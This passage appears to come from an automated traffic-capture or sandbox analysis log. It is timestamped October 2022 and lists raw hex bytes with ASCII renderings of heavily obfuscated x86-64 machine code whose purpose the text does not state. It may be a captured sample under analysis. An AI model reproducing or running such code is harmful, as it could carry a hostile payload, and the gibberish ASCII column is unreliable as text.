                                                                                                                Data Ascii: cIIfAIIp/Ct@M3HLIfA8/MIHID3fAHt%fAEHEID36@fAHfD+2EAfEfAfAfE4fEfAfAfE+fA2fDIff#f
                                                                                                                2022-10-13 11:07:30 UTC2575INData Raw: 44 31 1c 24 49 f7 d0 66 41 c1 e0 78 41 d2 e8 41 58 f9 f5 4d 63 db 84 c7 4d 03 d3 e9 7e b9 09 00 e9 09 40 fc ff e9 00 ac 02 00 ff e5 0f 85 6f 30 0c 00 4c 8b c8 e9 0e df 00 00 48 8b 07 41 b0 9a 45 2a c6 66 45 0f ab f8 48 81 c7 08 00 00 00 48 33 c3 44 1b c0 41 c0 c0 64 66 44 0f b6 c7 48 f7 d8 49 c1 c0 f5 41 80 e8 4e 66 44 0f be c7 48 05 63 00 62 54 66 44 0f be c0 4c 0f b7 c4 48 c1 c0 03 48 0f c8 48 33 d8 66 45 0f bb f0 66 41 c1 e8 25 49 81 e9 08 00 00 00 49 89 01 44 8b 07 e9 49 9e fc ff 49 8b 29 49 c1 d8 ba 66 45 0f ac d8 2f 66 44 33 d1 45 8b 51 08 66 45 0f 47 c4 49 81 c1 0c 00 00 00 44 33 c4 66 45 0f ac f8 4f 66 45 0f a4 c8 41 44 89 54 25 00 45 22 c0 49 f7 d8 41 c0 d0 54 44 8b 07 48 81 c7 04 00 00 00 45 84 d1 f9 e9 14 ca fc ff 8b 33 45 22 d4 44 8b 53 04 48
                                                                                                                Data Ascii: D1$IfAxAAXMcM~@o0LHAE*fEHH3DAdfDHIANfDHcbTfDLHHH3fEfA%IIDII)IfE/fD3EQfEGID3fEOfEADT%E"IATDHE3E"DSH
                                                                                                                2022-10-13 11:07:30 UTC2591INData Raw: 48 81 c5 04 00 00 00 84 f9 41 f6 c6 80 e9 cf d2 fb ff 41 8b 00 48 d3 ee 49 63 f0 66 0f a3 fe 41 8b 70 04 49 81 e8 04 00 00 00 e9 a0 c4 fe ff 48 8b d6 c0 cd 4d 48 81 ee 02 00 00 00 66 c1 c1 a6 66 89 16 c0 f1 0a 49 81 e8 04 00 00 00 41 8b 08 f8 f9 41 33 c9 e9 b0 89 ff ff 66 81 fb 95 6d 49 03 db ff e3 41 53 41 b3 75 31 14 24 41 5b 48 63 d2 41 3a eb 48 03 da e9 4a af 02 00 f5 41 d1 c8 f5 48 85 f3 41 0f c8 41 80 fe bf e9 6e 35 07 00 41 80 f9 5f 66 44 85 d6 41 33 f3 66 f7 c5 45 66 66 45 3b f7 f7 de e9 f0 05 09 00 45 8b 19 d2 e1 41 0a c7 41 8a 49 04 0f ba f8 60 41 0a c7 49 81 e9 06 00 00 00 41 d3 e3 49 63 c7 45 89 59 08 48 0f b7 c7 0f 9c c4 66 0f c8 9c 41 8f 01 41 02 c6 8b 07 48 81 c7 04 00 00 00 40 84 ff e9 1d b7 0d 00 41 ff c9 f8 41 d1 c1 e9 22 50 0c 00 0f cf
                                                                                                                Data Ascii: HAAHIcfApIHMHffIAA3fmIASAu1$A[HcA:HJAHAAn5A_fDA3fEffE;EAAI`AIAIcEYHfAAH@AA"P
                                                                                                                2022-10-13 11:07:30 UTC2607INData Raw: 41 81 f0 fa 5d 1d 5d 41 58 66 85 c0 48 63 ed e9 ca 50 02 00 41 80 f8 49 44 3a c0 81 c2 90 07 aa 55 0f ca f5 d1 c2 f5 e9 2f 8c 05 00 66 0f b6 33 48 d3 e8 41 80 f3 ec 44 8a 5b 02 66 13 c4 48 81 eb 06 00 00 00 9f 98 66 b8 3e 2f 40 f6 d6 48 0f ba f0 6a 66 ff c8 41 f6 d3 41 0a f3 9f 49 0f bf c1 66 89 73 08 66 0f c8 e9 9e 24 0c 00 41 ff c1 f9 f6 c6 28 41 81 f1 86 2b de 59 f9 3b c3 41 81 c1 b6 01 e8 57 41 81 f1 f1 34 4e 2b 41 f7 d9 41 c1 c1 03 f8 41 80 fe 55 56 41 1a f5 66 d3 c6 48 c1 d6 22 44 31 0c 24 66 0f ba f6 73 c1 ee 39 5e f9 4d 63 c9 e9 b6 ee fd ff f7 da f8 f9 e9 68 c4 04 00 66 41 0f ba f0 85 66 41 0f ba f8 f0 41 58 49 81 fd 2f 2d 96 72 48 63 ed f5 e9 3d ab 04 00 4d 85 db 57 f7 df 31 0c 24 40 80 df f1 66 c1 d7 6b 5f 48 63 c9 66 41 81 fb 97 53 e9 34 df 03
                                                                                                                Data Ascii: A]]AXfHcPAID:U/f3HAD[fHf>/@HjfAAIfsf$A(A+Y;AWA4N+AAAUVAfH"D1$fs9^MchfAfAAXI/-rHc=MW1$@fk_HcfAS4
                                                                                                                2022-10-13 11:07:30 UTC2623INData Raw: 4c 75 4b 38 4d 85 f9 57 44 31 1c 24 0f a3 df 40 c0 df 6a 5f 66 41 81 fe 77 1b f9 44 84 d9 4d 63 db 4d 03 cb 41 ff e1 66 45 8b 19 66 45 8b 51 02 66 44 0f ab f2 f6 de 49 81 e9 06 00 00 00 66 41 f7 d3 66 d3 e2 d2 fa 66 d1 f2 66 41 f7 d2 81 f2 a8 6a 8f 4a 80 e2 1d 2b d5 66 45 23 da 48 c7 c2 07 11 a7 70 99 66 45 89 59 08 49 0f b7 d5 41 0f b7 d4 66 0f ca 9c 41 13 d2 41 8f 01 40 32 d5 12 f4 49 81 e8 04 00 00 00 66 ba f3 59 41 8b 10 66 44 85 fc 33 d3 e9 8d e3 01 00 e9 8f 7f fb ff 0f c9 f5 d1 c1 f8 81 c1 15 3c 1e 26 e9 1c 76 09 00 4c 8b 13 9f 48 c1 f2 13 66 0f ba e0 c5 49 8b 12 48 89 13 c0 f8 47 d2 c8 0f bd c4 8b 44 25 00 f9 f8 48 81 c5 04 00 00 00 49 81 fb 5f 59 3a 42 33 c7 e9 d5 86 fa ff 45 86 c9 66 89 7d 08 44 0f bf cd 66 45 0f be ce 41 f6 d1 9c 8f 44 25 00 66
                                                                                                                Data Ascii: LuK8MWD1$@j_fAwDMcMAfEfEQfDIfAfffAjJ+fE#HpfEYIAfAA@2IfYAfD3<&vLHfIHGD%HI_Y:B3Ef}DfEAD%f
                                                                                                                2022-10-13 11:07:30 UTC2639INData Raw: d9 52 51 79 ae e8 00 70 37 7e 30 77 40 dd a5 13 de 4b 95 14 a9 f1 c4 1d 30 67 f4 1a 47 92 f9 12 ca 04 c9 15 bd be 98 1c 24 28 a8 1b 53 8b 3d 7f cd 1d 0d 78 ba a7 5c 71 23 31 6c 76 54 a0 71 c9 c4 36 41 ce b3 8c 10 c7 2a 1a 20 c0 5d b9 b5 a4 c3 2f 85 a3 b4 95 d4 aa 2d 03 e4 ad 5a ae 88 17 9a 38 b8 10 ed 82 e9 19 74 14 d9 1e 03 b7 4c 7a 9d 21 7c 7d ea 9b 2d 74 73 0d 1d 73 04 9c 00 cc 94 0a 30 cb e3 b0 61 c2 7a 26 51 c5 0d 85 c4 a1 93 13 f4 a6 e4 a9 a5 af 7d 3f 95 a8 0a ca 98 a0 87 5c a8 a7 f0 e6 f9 ae 69 70 c9 a9 1e d3 5c cd 80 45 6c ca f7 ff 3d c3 6e 69 0d c4 19 f8 10 7b 89 6e 20 7c fe d4 71 75 67 42 41 72 10 e1 d4 16 8e 77 e4 11 f9 cd b5 18 60 5b 85 1f 17 66 a8 79 a1 f0 98 7e d6 4a c9 77 4f dc f9 70 38 7f 6c 14 a6 e9 5c 13 d1 53 0d 1a 48 c5 3d 1d 3f 54 20
                                                                                                                Data Ascii: RQyp7~0w@K0gG$(S=x\q#1lvTq6A* ]/-Z8tLz!|}-tss0az&Q}?\ip\El=ni{n |qugBArw`[fy~JwOp8l\SH=?T
                                                                                                                2022-10-13 11:07:30 UTC2655INData Raw: fb ff 48 8b 74 25 00 9f 44 0f ab ca 0f bf d5 48 8b 55 08 48 f7 d6 66 44 0f ab f8 48 f7 d2 f9 48 0b f2 49 0f b7 c4 49 63 c3 48 89 75 08 66 98 e9 26 19 09 00 f9 41 c1 c1 03 41 0f c9 e9 4e 1a 06 00 81 f2 f9 55 01 25 53 31 14 24 1b de 5b 41 80 f8 02 48 63 d2 48 03 f2 e9 13 39 0a 00 4d 8b 19 0f bf e8 48 c1 f3 2d 49 81 c1 08 00 00 00 b3 b4 66 0f 42 ed 40 0f 9a c5 49 8b db 40 b5 2e 49 8b e9 e9 9f b0 02 00 49 ff c2 41 81 f1 ac 17 02 5e 48 ff ca 0f 85 89 90 06 00 5e c1 c9 a4 66 0f ba e1 53 41 f7 d1 c0 c5 2a 48 0f b3 d1 66 0f b6 cc 44 89 4c 25 00 40 2a cd 41 8b 0b 45 3b f7 e9 39 f1 04 00 ff ca e9 a7 51 fd ff 49 8b 0b 4d 8b 4b 08 f8 40 f6 c6 4e 49 81 c3 10 00 00 00 f8 41 80 fa 18 49 f7 c7 56 25 93 58 36 4c 89 09 49 81 ea 04 00 00 00 41 0f bf cb 66 f7 d1 48 0f b3 d9
                                                                                                                Data Ascii: Ht%DHUHfDHHIIcHuf&AANU%S1$[AHcH9MH-IfB@I@.IIA^H^fSA*HfDL%@*AE;9QIMK@NIAIV%X6LIAfH
                                                                                                                2022-10-13 11:07:30 UTC2671INData Raw: d6 48 0f a4 e3 7c 0f a2 49 81 c9 d0 5c b8 08 49 81 eb 0c 00 00 00 66 45 0f bd c8 41 89 43 0c 41 f6 d1 41 89 5b 08 41 80 c9 26 44 0f 46 c8 41 89 4b 04 45 32 ce 41 f7 d1 41 c1 f9 0d 41 89 13 41 d2 c1 49 0f a4 f1 8b 49 81 ea 04 00 00 00 45 8b 0a 66 3b d7 44 33 cd e9 81 9a f9 ff 41 80 ff 19 56 40 80 d6 74 31 04 24 66 81 ce 2a 69 d3 fe 5e f8 48 63 c0 e9 f8 b7 00 00 ff e6 53 c3 41 ff c9 41 d1 c1 e9 8f 3f 03 00 49 81 ea 08 00 00 00 66 0f a3 ff 49 8b 3a 66 41 0f a3 db 49 33 f8 66 41 bb 73 78 45 0f bf de 48 ff cf 66 44 0f 47 da 41 ff cb 48 0f cf 41 f6 d3 66 45 0f b6 da 4d 63 db 48 ff cf 45 0f a3 fb 48 d1 cf e9 01 29 01 00 41 f7 d1 41 ff c9 f8 41 d1 c1 e9 ba 82 fd ff 41 d1 c0 f5 66 41 3b ee e9 fb 79 ff ff ff cf 81 f7 db 7c be 17 f7 df 41 51 41 d2 d1 49 0f c9 41 d2
                                                                                                                Data Ascii: H|I\IfEACAA[A&DFAKE2AAAAIIEf;D3AV@t1$f*i^HcSAA?IfI:fAI3fAsxEHfDGAHAfEMcHEH)AAAAfA;y|AQAIA
                                                                                                                2022-10-13 11:07:30 UTC2687INData Raw: bf df 4c 63 da 9c f8 49 3b e0 41 8f 01 49 d3 cb 41 80 fd b5 66 41 c1 d3 36 49 81 e8 04 00 00 00 66 41 f7 c4 83 51 66 45 0f bc dd 45 8b 18 66 f7 c7 6e 5e e9 7a cf fd ff 41 ff e0 66 23 e8 e9 08 d7 09 00 48 03 d9 e9 50 63 07 00 0f cf f5 f8 c1 c7 03 0f cf e9 eb 21 fb ff 45 8b 08 80 e9 c7 49 0f ba f2 85 8b c6 45 8b 50 04 41 8a 48 08 49 81 e8 02 00 00 00 0f a3 e0 48 d3 d0 45 0f ad d1 66 98 66 40 0f be c5 66 90 45 89 48 08 49 0f bf c3 66 98 9c 02 e0 66 44 0f a4 e8 c6 41 8f 00 8b 03 41 80 ff f8 48 81 c3 04 00 00 00 e9 53 43 08 00 48 63 f6 44 85 f5 f5 4c 03 d6 e9 08 cd fb ff 41 f6 c6 52 0f c9 f9 81 e9 48 54 4b 0a f8 41 80 fa b5 81 f1 95 04 e0 6e 57 49 33 fa 41 0f b7 f8 31 0c 24 66 d3 cf 0f cf 66 d3 ff 5f 41 f7 c3 96 1f 2e 7e 85 db f9 48 63 c9 f6 c2 b2 e9 3e 7f fd
                                                                                                                Data Ascii: LcI;AIAfA6IfAQfEEfn^zAf#HPc!EIEPAHIHEff@fEHIffDAAHSCHcDLARHTKAnWI3A1$ff_A.~Hc>
                                                                                                                2022-10-13 11:07:30 UTC2703INData Raw: f6 48 0f ce 41 f6 d0 41 5d e9 8a 99 02 00 41 c1 cb 03 45 3a dc 41 81 f3 ac 38 88 5b e9 9b f7 00 00 ff e7 f7 d0 57 31 04 24 66 41 0f b6 fc 5f f5 66 41 81 fc d8 1b e9 7b b0 03 00 f8 41 c1 c0 02 e9 39 60 fc ff ff e5 ff c0 f9 f5 35 55 29 23 7c 55 41 0f bc ea 48 0f ba f5 48 48 81 ed 0f 73 5a 53 31 04 24 5d f8 48 63 c0 48 03 f0 e9 7e 87 02 00 ff c1 f7 d1 53 40 84 fd 31 0c 24 48 63 df 66 44 0f ac d3 9b 5b 48 3b d9 48 63 c9 48 03 f1 e9 f6 37 0b 00 41 ff c2 f8 41 51 66 41 0f ba f9 6c 41 d2 f9 44 31 14 24 41 59 4d 63 d2 66 f7 c7 27 06 49 03 ea e9 ae 40 08 00 81 e9 bf 4f 40 75 f9 e9 c3 db fd ff 48 81 ee 08 00 00 00 4c 8b 16 4d 33 d3 41 0f bf f9 49 0f ca 66 41 8b fb e9 35 00 0b 00 c1 c7 03 e9 54 0f fc ff 41 8b 01 53 d2 f3 0f a2 49 81 e9 0c 00 00 00 41 89 41 0c 45 84
                                                                                                                Data Ascii: HAA]AE:A8[W1$fA_fA{A9`5U)#|UAHHHsZS1$]HcH~S@1$HcfD[H;HcH7AAQfAlAD1$AYMcf'I@O@uHLM3AIfA5TASIAAE
                                                                                                                2022-10-13 11:07:30 UTC2719INData Raw: d2 89 4e 08 44 0f 4c d1 4d 0f b7 d5 9c 41 81 da 76 25 0a 36 8f 06 4c 33 d4 49 81 e8 04 00 00 00 4c 63 d4 45 8b 10 41 80 ff 8a 66 85 f0 f8 45 33 d1 41 f7 da e9 88 9b 07 00 c3 66 8b 33 66 41 c1 e8 44 66 44 8b 43 02 e9 b5 73 ff ff 56 c3 f5 41 d1 c1 e9 72 12 06 00 f5 41 0f ca f9 e9 d8 7f 05 00 e9 df f4 00 00 41 51 66 41 b9 df 2a 66 44 0f bd c8 41 f6 d1 31 3c 24 41 0f 90 c1 49 0f ba f1 c5 41 59 f6 c5 00 48 63 ff e9 a2 99 06 00 45 8b 01 66 41 33 c5 4d 1b dc 45 8b 59 04 66 0f ba f0 77 41 12 ca 41 8a 49 08 66 0f ba f8 30 48 0f bb f0 49 81 e9 02 00 00 00 0f c1 c0 48 98 66 44 0f ac c8 2b 45 0f a5 d8 86 c4 45 89 41 08 49 63 c1 49 0f b7 c3 9c c0 f8 19 41 8f 01 66 0f bc c3 8b 07 48 81 c7 04 00 00 00 40 f6 c7 6e f5 33 c3 f8 f7 d8 e9 d2 d9 07 00 4d 63 d2 49 81 fd 89 77
                                                                                                                Data Ascii: NDLMAv%6L3ILcEAfE3Af3fADfDCsVArAAQfA*fDA1<$AIAYHcEfA3MEYfwAAIf0HIHfD+EEAIcIAfH@n3McIw
                                                                                                                2022-10-13 11:07:30 UTC2735INData Raw: 00 00 66 0f ba f9 86 e9 d6 01 08 00 44 0f b6 1f 66 ff c1 48 81 c7 01 00 00 00 44 84 fa 44 32 db 66 0f c8 f6 d1 41 fe cb 41 d0 c3 d2 d0 4c 85 ca 41 f6 db 41 fe c3 48 d3 f8 66 0b cd 48 0f bc c5 41 32 db 66 42 0f b6 0c 1c 49 81 e9 02 00 00 00 66 41 89 09 8b 07 45 84 dd f5 f9 48 81 c7 04 00 00 00 f8 33 c3 e9 ab f1 09 00 ff e3 e9 b9 2b 00 00 f9 2d a6 7c e7 27 41 51 66 41 c1 d9 96 31 04 24 66 45 0f a4 d1 68 41 59 48 63 c0 a8 40 48 03 e8 e9 86 18 08 00 4d 63 c9 49 03 f1 56 c3 ff ce 0f ce 80 fa 60 48 a9 fe 35 10 27 41 50 66 44 0f be c3 31 34 24 41 b8 6a 49 b3 0a 41 58 48 63 f6 4c 03 d6 41 ff e2 41 8a cc 41 22 cb 41 8a 48 08 66 41 81 fb 25 4f 41 84 ee f9 49 81 e8 06 00 00 00 4c 3b e1 44 84 fa f8 49 d3 ea 66 0f be cb 0f b7 cd b1 d6 4d 89 50 08 86 e9 e9 c7 40 04 00
                                                                                                                Data Ascii: fDfHDD2fAALAAHfHA2fBIfAEH3+-|'AQfA1$fEhAYHc@HMcIV`H5'APfD14$AjIAXHcLAAA"AHfA%OAIL;DIfMP@
                                                                                                                2022-10-13 11:07:30 UTC2751INData Raw: 79 49 2d bd 40 9a 2e f5 f8 c1 c0 02 0f c8 e9 70 e4 fc ff 41 ff c9 41 f7 d9 41 ff c1 66 f7 c1 71 34 41 84 e0 41 f7 d1 44 84 c4 f5 66 41 3b ff 41 53 44 31 0c 24 41 5b e9 28 49 fa ff 4d 8b 1b d2 f1 d2 e5 32 ec 49 81 ea 04 00 00 00 49 63 cd 41 8b 0a 33 cd 81 f1 62 59 18 4c 44 3a e3 f7 d1 3a dc 66 81 fd 56 4e f7 d9 41 f6 c1 3c f7 d1 55 31 0c 24 5d f6 c6 ad 66 45 85 ee 48 63 c9 41 f6 c7 09 48 03 f1 e9 1d 20 fa ff 48 8b e5 0f ab e3 48 99 59 66 41 81 fe 32 5b 48 99 5b 41 5c 44 87 f5 49 0f cf 5f 41 5d 0f bf d1 41 80 c7 48 66 85 d8 41 59 9d 41 b0 f8 66 44 0f be ff 41 5a 5a 44 0f b7 fa 0f bf f2 9f 41 5e 4d 63 c3 48 98 41 5f 66 f7 d5 66 0f 44 f6 5d 66 98 41 5b 49 0f b7 f0 4d 63 c1 41 0f b7 f0 41 58 5e 98 e9 18 fd 03 00 41 3a d7 48 03 f7 e9 70 2c 05 00 33 fb c1 cf 03
                                                                                                                Data Ascii: yI-@.pAAAfq4AADfA;ASD1$A[(IM2IIcA3bYLD::fVNA<U1$]fEHcAH HHYfA2[H[A\DI_A]AHfAYAfDAZZDA^McHA_ffD]fA[IMcAAX^A:Hp,3
                                                                                                                2022-10-13 11:07:30 UTC2767INData Raw: d9 8e 4b 0b ae 34 1a 02 37 a2 2a 05 40 33 37 ba d0 a5 07 bd a7 1f 56 b4 3e 89 66 b3 49 2a f3 d7 d7 bc c3 d0 a0 06 92 d9 39 90 a2 de 4e 65 af d6 c3 f3 9f d1 b4 49 ce d8 2d df fe df 5a 7c 6b bb c4 ea 5b bc b3 50 0a b5 2a c6 3a b2 5d 57 27 0d cd c1 17 0a ba 7b 46 03 23 ed 76 04 54 4e e3 60 ca d8 d3 67 bd 62 82 6e 24 f4 b2 69 53 59 de d3 93 cf ee d4 e4 75 bf dd 7d e3 8f da 0a 40 1a be 94 d6 2a b9 e3 6c 7b b0 7a fa 4b b7 0d 6b 56 08 9d fd 66 0f ea 47 37 06 73 d1 07 01 04 72 92 65 9a e4 a2 62 ed 5e f3 6b 74 c8 c3 6c 03 3d ce 64 8e ab fe 63 f9 11 af 6a 60 87 9f 6d 17 24 0a 09 89 b2 3a 0e fe 08 6b 07 67 9e 5b 00 10 0f 46 bf 80 99 76 b8 f7 23 27 b1 6e b5 17 b6 19 16 82 d2 87 80 b2 d5 f0 3a e3 dc 69 ac d3 db 1e 91 fe bd a8 07 ce ba df bd 9f b3 46 2b af b4 31 88 3a
                                                                                                                Data Ascii: K47*@37V>fI*9NeI-Z|k[P*:]W'{F#vTN`gbn$iSYu}@*l{zKkVfG7sreb^ktl=dcj`m$:kg[Fv#'n:iF+1:
                                                                                                                2022-10-13 11:07:30 UTC2783INData Raw: eb e9 6b c8 f9 ff 41 ff e1 48 8b 0e 66 8b 19 48 81 c6 06 00 00 00 66 89 1e 49 81 e8 04 00 00 00 66 90 41 80 fd c4 49 63 c4 41 8b 00 48 81 fb e7 12 20 60 41 33 c1 2d 05 12 a4 37 f7 d0 f5 0f c8 f8 45 85 fc f9 2d a6 7c e7 27 45 84 e2 41 51 49 d3 f1 f8 31 04 24 41 80 f8 c7 41 d2 d1 41 80 c9 25 41 59 f9 41 f6 c2 b0 48 63 c0 e9 53 bb f7 ff 66 41 8b 11 66 45 8b 59 02 40 fe c7 49 81 e9 06 00 00 00 66 d3 c7 40 86 ff 66 41 03 d3 66 41 89 51 08 41 0f bf fe f7 d7 9c 66 81 e7 a2 6c 41 8f 01 49 81 e8 04 00 00 00 66 c1 c7 3c 48 f7 d7 66 41 13 ff 41 8b 38 f5 33 fb f7 df f9 81 f7 cc 3d d9 7a 81 c7 a4 5a 17 40 f8 c1 c7 02 f7 d7 c1 cf 02 f9 e9 cb b4 01 00 f9 41 3a c5 48 89 7c 25 00 48 81 c7 c8 50 38 74 8b 3b 40 80 ff e3 66 f7 c3 64 29 48 81 c3 04 00 00 00 f8 41 f6 c7 12 41
                                                                                                                Data Ascii: kAHfHfIfAIcAH `A3-7E-|'EAQI1$AAA%AYAHcSfAfEY@If@fAfAQAflAIf<HfAA83=zZ@A:H|%HP8t;@fd)HAA
                                                                                                                2022-10-13 11:07:30 UTC2799INData Raw: 8f 03 f8 40 80 ff 53 45 02 cf 49 81 ea 04 00 00 00 41 f6 d9 45 8b 0a 44 33 cd 80 f9 f1 f8 41 f7 d9 e9 95 d5 01 00 66 3b eb 2d 15 37 4b 63 f8 56 66 c1 ce 06 41 12 f5 ff ce 31 04 24 5e 45 3b ca 48 63 c0 49 f7 c4 89 27 dd 4a f5 e9 86 83 00 00 4c 03 c2 e9 b1 20 05 00 49 8b 03 40 d2 f7 40 c0 cf 36 41 f6 c0 2e 49 8b 5b 08 40 86 f9 40 d2 d7 80 d1 30 41 8a 4b 10 48 0f a3 f7 d3 d7 40 80 c7 1d 49 81 c3 02 00 00 00 48 0f a5 d8 66 40 0f b6 ff 0f b7 fb 40 b7 4b 49 89 43 08 40 b7 22 9c 66 0f cf 41 8f 03 49 81 ea 04 00 00 00 66 44 0f ab e7 66 0f b3 ff 41 8b 3a f8 45 85 f2 33 fd 85 cb f8 81 ef d4 6d 0e 28 0f cf f9 c1 c7 02 ff c7 f9 66 41 81 fb a7 65 e9 85 62 09 00 55 c3 48 8b 74 25 00 0f bf ff 66 0f ba ff 2c 81 ef d6 76 fe 4a 48 8b 3e 48 89 7c 25 00 49 0f b7 fc 66 41 0f
                                                                                                                Data Ascii: @SEIAED3Af;-7KcVfA1$^E;HcI'JL I@@6A.I[@@0AKH@IHf@@KIC@"fAIfDfA:E3m(fAebUHt%f,vJH>H|%IfA
                                                                                                                2022-10-13 11:07:30 UTC2815INData Raw: 14 24 66 41 d3 e3 41 5b 66 3d 38 0e f5 41 84 c9 4d 63 d2 f8 40 f6 c5 1c 49 03 fa e9 64 60 05 00 41 f7 d1 41 ff c1 f9 f5 41 d1 c1 f5 41 50 45 22 c0 41 d2 e8 4d 0f b7 c4 44 31 0c 24 41 d2 e0 41 d2 d0 41 58 4d 63 c9 41 80 fb dc f9 49 03 d9 e9 50 30 04 00 f7 d0 f5 e9 5f 60 f8 ff 48 8b 13 80 d5 b7 66 41 23 f3 48 8b 73 08 48 f7 d2 66 0f a3 e1 03 cb 48 f7 d6 66 c1 e9 11 66 d3 c9 66 44 0f ab f1 48 0b d6 49 63 cb 48 89 53 08 48 0f b7 cc 48 63 cc 9c c0 c5 0b 41 0f b7 c8 66 c1 d1 18 8f 03 fe cd 8b 4c 25 00 41 3a fc 48 81 c5 04 00 00 00 41 80 fc 53 3a df f8 33 cf f5 48 3b e9 f6 c3 85 f7 d9 0f c9 81 c1 14 39 6f 04 45 3b fc 81 f1 8b 3c b9 46 f8 e9 48 58 01 00 44 84 c2 48 63 c9 f8 66 41 f7 c7 fa 4d 4c 03 d1 e9 66 e7 07 00 4c 8b 4c 25 00 48 8b 55 08 48 81 c5 10 00 00 00
                                                                                                                Data Ascii: $fAA[f=8AMc@Id`AAAAPE"AMD1$AAAXMcAIP0_`HfA#HsHfHfffDHIcHSHHcAfL%A:HAS:3H;9oE;<FHXDHcfAMLfLL%HUH
                                                                                                                2022-10-13 11:07:30 UTC2831INData Raw: 32 f3 e9 0d 0e 01 00 49 8b 28 41 8a 48 08 e9 fa ee f6 ff ff cd 45 84 d1 40 3a dd 41 50 31 2c 24 41 58 48 63 ed 48 03 dd e9 4a fa f7 ff 48 8b 7c 25 00 49 f7 d2 41 f6 da 4d 13 d4 65 4c 8b 17 49 0f b7 da 4c 89 54 25 00 c0 cb 36 86 db 41 f7 c4 5f 34 6e 2e 41 8b 1b f5 66 f7 c5 73 0a 49 81 c3 04 00 00 00 45 84 c3 33 de e9 e3 c9 fe ff f7 df e9 2a e7 02 00 f8 d1 c7 f8 80 fd e6 55 31 3c 24 41 0f 4c ed 40 f6 d5 5d 49 f7 c4 3a 52 53 14 f9 48 63 ff 48 03 f7 e9 8f fe 09 00 f9 49 81 c3 04 00 00 00 66 41 85 c2 44 33 ce e9 d8 ec 05 00 53 66 41 0f 49 db 80 d7 ae 44 31 14 24 48 87 db 66 81 d3 33 3e 66 41 13 d8 5b f9 e9 9c 26 f9 ff ff c9 e9 db d4 08 00 44 0f b6 16 45 32 d3 f9 41 d0 ca f5 e9 4f 89 04 00 e9 ac 2c 08 00 4c 8b 44 25 00 48 8b 4d 08 66 41 0f bd ff 48 81 c5 10 00
                                                                                                                Data Ascii: 2I(AHE@:AP1,$AXHcHJH|%IAMeLILT%6A_4n.AfsIE3*U1<$AL@]I:RSHcHIfAD3SfAID1$Hf3>fA[&DE2AO,LD%HMfAH
                                                                                                                2022-10-13 11:07:30 UTC2847INData Raw: 4e 08 9c 48 63 ff 66 f7 df 40 80 cf ab 8f 06 40 86 ff 49 81 e8 04 00 00 00 40 f6 df d3 d7 40 d2 f7 41 8b 38 66 81 fe 15 6c 41 33 f9 f7 df 66 85 ee 81 ef ab 3c 44 67 e9 bb 64 08 00 4d 8b 10 49 8b 68 08 66 0f ba e0 d5 49 81 c0 10 00 00 00 48 81 d8 86 53 23 71 36 49 89 2a 8b 03 e9 e0 46 fd ff ff e3 49 81 e8 04 00 00 00 66 15 ff 07 45 02 d9 41 8b 00 41 80 f3 c0 41 33 c1 66 45 0f b6 df ff c8 f7 d8 c1 c8 02 66 45 0f be da 41 bb 2d 53 01 26 ff c8 66 44 0f bc d8 41 51 66 41 0f ba f3 ae 31 04 24 41 c0 fb 61 41 59 45 2a dd 66 45 0f a3 cb 48 81 ee 04 00 00 00 49 d3 f3 f9 89 06 66 41 0f a3 d3 66 44 13 d9 45 86 db 49 81 e8 04 00 00 00 45 8b 18 45 33 d9 e9 b7 c2 04 00 ff ce d1 ce 66 45 3b e1 80 fc 2a 57 40 c0 ef ad 40 86 ff 0b f9 31 34 24 66 c1 d7 b2 66 0f ba ff 8d 5f
                                                                                                                Data Ascii: NHcf@@I@@A8flA3f<DgdMIhfIHS#q6I*FIfEAAA3fEfEA-S&fDAQfA1$AaAYE*fEHIfAfDEIEE3fE;*W@@14$ff_
                                                                                                                2022-10-13 11:07:30 UTC2863INData Raw: 81 cc 01 00 ff cf 81 f7 fe 3a 72 4e 53 31 3c 24 d3 f3 48 81 c3 a6 0f 29 26 5b 48 63 ff 48 03 ef e9 9a 00 09 00 55 40 c0 fd b7 40 80 f5 d3 31 14 24 66 f7 d5 66 44 0f b3 c5 c1 f5 71 5d 66 3b d5 48 63 d2 41 f7 c4 ff 67 67 11 48 03 f2 e9 18 6d 03 00 55 40 80 cd 4c 66 41 0f bd ed 31 0c 24 48 81 f5 f4 23 0a 47 40 c0 f5 3d 0f ba fd 22 5d 49 81 ff b8 0e 8a 27 45 3a ed 48 63 c9 a8 93 41 80 fd 72 48 03 f1 e9 f4 08 06 00 41 8b 39 41 81 fd 4a 79 2d 4c 41 8a 49 04 66 81 fc 61 1d f5 49 81 e9 06 00 00 00 40 3a dc d3 e7 e9 5f 60 f7 ff ff e6 4c 8b 1e 41 b1 fa 8a 4e 08 4c 63 c8 41 d2 c1 44 1a c9 48 81 c6 0a 00 00 00 26 41 88 0b 49 81 ea 04 00 00 00 49 0f c9 45 86 c9 45 0f bf c8 45 8b 0a f8 45 33 c8 f5 45 3a ed 41 81 e9 79 00 2d 0c e9 3c 21 f6 ff 41 ff c2 41 f7 da e9 c2 5e
                                                                                                                Data Ascii: :rNS1<$H)&[HcHU@@1$ffDq]f;HcAggHmU@LfA1$H#G@="]I'E:HcArHA9AJy-LAIfaI@:_`LANLcADH&AIIEEEE3E:Ay-<!AA^
                                                                                                                2022-10-13 11:07:30 UTC2879INData Raw: df 41 c0 e0 71 f9 44 31 0c 24 41 58 4d 63 c9 49 03 d9 e9 f0 ce 02 00 41 ff c9 e9 c3 e7 f8 ff 66 8b 1b 44 8b 44 25 00 f5 48 81 c5 04 00 00 00 f8 44 33 c7 f9 41 f7 d8 41 81 e8 4b 32 85 47 f9 41 0f c8 e9 b0 7a f8 ff 48 8b 2e 4c 8b 5e 08 22 c8 8a 4e 10 48 81 c6 02 00 00 00 4c 0f a5 dd 45 0f bf dc 41 0f 9d c3 48 89 6e 08 9c 8f 06 49 81 ea 04 00 00 00 66 45 0f be d8 45 8b 1a f9 66 45 3b f3 e9 b9 35 fd ff 41 c1 ca 03 40 3a d4 f5 41 f7 da f8 f9 41 d1 ca 41 53 45 23 de 44 31 14 24 41 5b f5 f9 4d 63 d2 e9 2d 37 fd ff 41 50 41 0f 98 c0 31 14 24 41 81 f0 49 0f 1d 11 66 41 c1 f0 e7 45 86 c0 41 58 f5 e9 dc b3 fc ff 0f 85 7e 19 f6 ff 48 8b 44 25 00 48 81 ec 20 00 00 00 e9 4e 85 08 00 41 f7 d9 f8 41 50 44 31 0c 24 49 c1 e8 fe f8 41 58 4d 63 c9 4d 03 d1 e9 92 b0 00 00 48
                                                                                                                Data Ascii: AqD1$AXMcIAfDD%HD3AAK2GAzH.L^"NHLEAHnIfEEfE;5A@:AAASE#D1$A[Mc-7APA1$AIfAEAX~HD%H NAAPD1$IAXMcMH
